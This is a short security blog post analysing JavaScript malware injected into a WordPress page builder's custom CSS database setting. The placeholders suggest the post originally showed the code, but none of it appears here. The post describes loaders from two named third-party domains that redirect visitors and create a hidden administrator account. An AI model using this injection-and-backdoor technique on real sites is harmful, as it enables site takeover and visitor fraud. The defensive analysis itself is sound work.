YourService-Live & AdsNet-Work — Website Redirect-Causing JavaScript

Example of JavaScript malware from a third-party domain adsnet dot work

Javascript Redirect

Recently we had a chance to analyse some malware injected in the database. Malware injected into the database is tricky to catch for several reasons firstly because most malware scanners skip the database scan or only support a partial scan of the database. Secondly, it’s not just possible to know if a piece of code in the database is actually malware unless you can decode it or match it against known malware signatures.

The Malicious Code

The following piece of malware code was found infected in the database custom_CSS settings of Bold Builder — A WordPress page builder.

encoded malware code

The code would render as is on the front-end in the source-code of the page. However as you can see, it has two distinct lines.

Here’s what the first line decodes to:

decoded malware code

As you can see, it loads a JavaScript malware from a third-party domain adsnet dot work.

Here’s what the second line decodes to:

decoded malware code

Symptoms of Malware

And as you can guess from the behaviour of the previous malware snippet, this on loads a JavaScript malware from a third-party domain yourservice dot live.

Comprehensive Guide to Removing JavaScript Redirect Malware from WordPress

Both end-up triggering a malicious JavaScript redirect for the website-visitors landing them to rogue sites. Not only that, when a user with administrative privileges tries to access the site, the script triggers creating a new user allowing privileged access to the site to the new illegitimate user.

One of these scripts also ends up redirecting search-bots like Google etc. This eventually results in reindexing the site and a loss of search engine ranks thus website traffic.

See Also:

This article is written by Evelyn Allison. Evelyn has over two decades of experience with the big-tech corporate giants. Starting in 2002 with consumer IT remote support, he transitioned into IT enterprise support and systems provisioning for Windows and Linux servers. Her prowess spans her expertise in network security, security audit and scripting-based-automation. Actively involved in web security since 2017, Evelyn has worked with various technologies to secure the web, leveraging tech like Nginx, modsecurity, reverse-proxies, developing web-application-firewalls, on-the-fly asset optimization using Google’s PageSpeed Module and more. Her expertise is reflected in the top-tier plugins and comprehensive consulting-services she offers in the domain of web-security.